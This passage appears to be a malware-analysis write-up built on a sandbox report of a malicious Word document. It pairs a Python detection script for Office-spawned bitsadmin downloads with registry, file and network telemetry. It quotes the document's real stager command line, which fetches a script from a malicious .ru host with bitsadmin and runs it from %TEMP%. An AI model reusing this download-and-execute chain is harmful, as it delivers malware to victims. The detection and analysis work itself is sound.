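bitsadmin /transfer <url> <path> && start <path>) in process-creation telemetry.

Added example, not part of the ANY.RUN report. Events are constructed from the
report's command lines; the record layout (pid, ppid, image, cmdline,
parent image) is an assumed Sysmon Event ID 1 subset.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

BITS_TRANSFER = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'&|]+", re.I)
# Local destination: an env-var prefix (%TEMP%\...) or a drive-letter path.
PATH_RE = re.compile(r"(?:%[A-Za-z_]+%|[A-Za-z]:)\\[^\s\"'&|]+")
# "start <something.js>": the launcher half of the chain.
START_SCRIPT = re.compile(r"\bstart\b\s+(?:\"\"\s+)?(\S+\.(?:js|jse|vbs|vbe|wsf|hta|ps1|exe|scr))\b", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid, max_depth=8):
    """Image basenames from pid upward, stopping at the oldest recorded ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def analyze(events):
    by_pid = {e.pid: e for e in events}
    alerts, urls, dests = [], set(), set()
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        office_ancestor = any(p in OFFICE_APPS for p in ancestry(e.pid, by_pid)[1:])
        if parent in OFFICE_APPS and img in SHELLS:
            alerts.append((e.pid, "office_spawns_shell", "%s -> %s" % (parent, img)))
        if BITS_TRANSFER.search(e.cmdline):
            u, d = URL_RE.findall(e.cmdline), PATH_RE.findall(e.cmdline)
            urls.update(u)
            dests.update(d)
            sev = "high" if office_ancestor else "medium"
            alerts.append((e.pid, "bitsadmin_download", "%s: %s -> %s" % (sev, " ".join(u), " ".join(d))))
        m = START_SCRIPT.search(e.cmdline)
        if m:
            alerts.append((e.pid, "script_launch", m.group(1)))
    return {"alerts": alerts, "urls": sorted(urls), "destinations": sorted(dests)}


# Constructed from the report's process table (explorer.exe's own record omitted;
# its PID and the control entry's PIDs are made up).
EVENTS = [
    ProcEvent(2860, 1234, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW ORDER.doc"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4092, 2860, r"C:\Windows\system32\cmd.exe",
              r"cmd.exe /C CD C: & bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js %TEMP%\Name.js && start %TEMP%\Name.js",
              r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    ProcEvent(2660, 4092, r"C:\Windows\system32\bitsadmin.exe",
              r"bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js C:\Users\admin\AppData\Local\Temp\Name.js",
              r"C:\Windows\system32\cmd.exe"),
    # Constructed benign control: an admin listing BITS jobs from a console.
    ProcEvent(5100, 5000, r"C:\Windows\system32\bitsadmin.exe", "bitsadmin /list /allusers",
              r"C:\Windows\system32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, kind, detail in analyze(EVENTS)["alerts"]:
        print(pid, kind, detail)
```

The ancestry walk is what separates this from a plain command-line match: bitsadmin.exe's own parent is just cmd.exe, and only by walking to WINWORD.EXE does the download get rated high, while the control record with no /transfer produces nothing.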
Total events: 1 322
Read events: 716
Write events: 601
Delete events: 5

Modification events

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: #:$
Value: 233A24002C0B0000010000000000000000000000

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: On

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: WORDFiles
Value: 1311375390

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1311375504

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1311375505

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: write
Name: MTTT
Value: 2C0B0000BAADD42500A9D40100000000

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: 8<$
Value: 383C24002C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value
Name: 8<$
Value: 383C24002C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (2860) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0

All of these are written by WINWORD.EXE itself, none by the spawned cmd.exe or bitsadmin.exe. The 8<$ value is the UTF-16LE path C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm (0x3E = 62 characters) in Word's Resiliency\StartupItems, written while the file is open and deleted again in the next entry; it is Word's document-recovery bookkeeping, not persistence planted by the macro.
Executable files: 0
Suspicious files: 0
Text files: 0
Unknown types: 2

Dropped files

PID 2860, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVR8A83.tmp.cvr
PID 2860, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\~$W ORDER.doc (type: pgc)
PID 2860, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (type: pgc)
HTTP(S) requests: 1
TCP/UDP connections: 1
DNS requests: 1
Threats: 0

HTTP requests

Method: HEAD
HTTP code: 404
IP: 87.236.16.54:80
URL: http://rossichspb.ru/c/tt.js
CN: RU
Reputation: malicious

The HEAD request is BITS sizing the transfer before it downloads; the 404 means the second stage (tt.js) was not being served at analysis time. That is why bitsadmin.exe exited with 0x80190194 (BG_E_HTTP_ERROR_404), why the && guard in the cmd.exe command line never ran "start %TEMP%\Name.js", and why no Name.js appears among the dropped files. The report therefore covers only the stager inside the document, not the payload it tried to fetch.

Connections

IP: 87.236.16.54:80
Domain: rossichspb.ru
ASN: Beget Ltd
CN: RU
Reputation: malicious

DNS requests

Domain: rossichspb.ru
IP: 87.236.16.54
Reputation: malicious

Threats

No threats detected
No debug info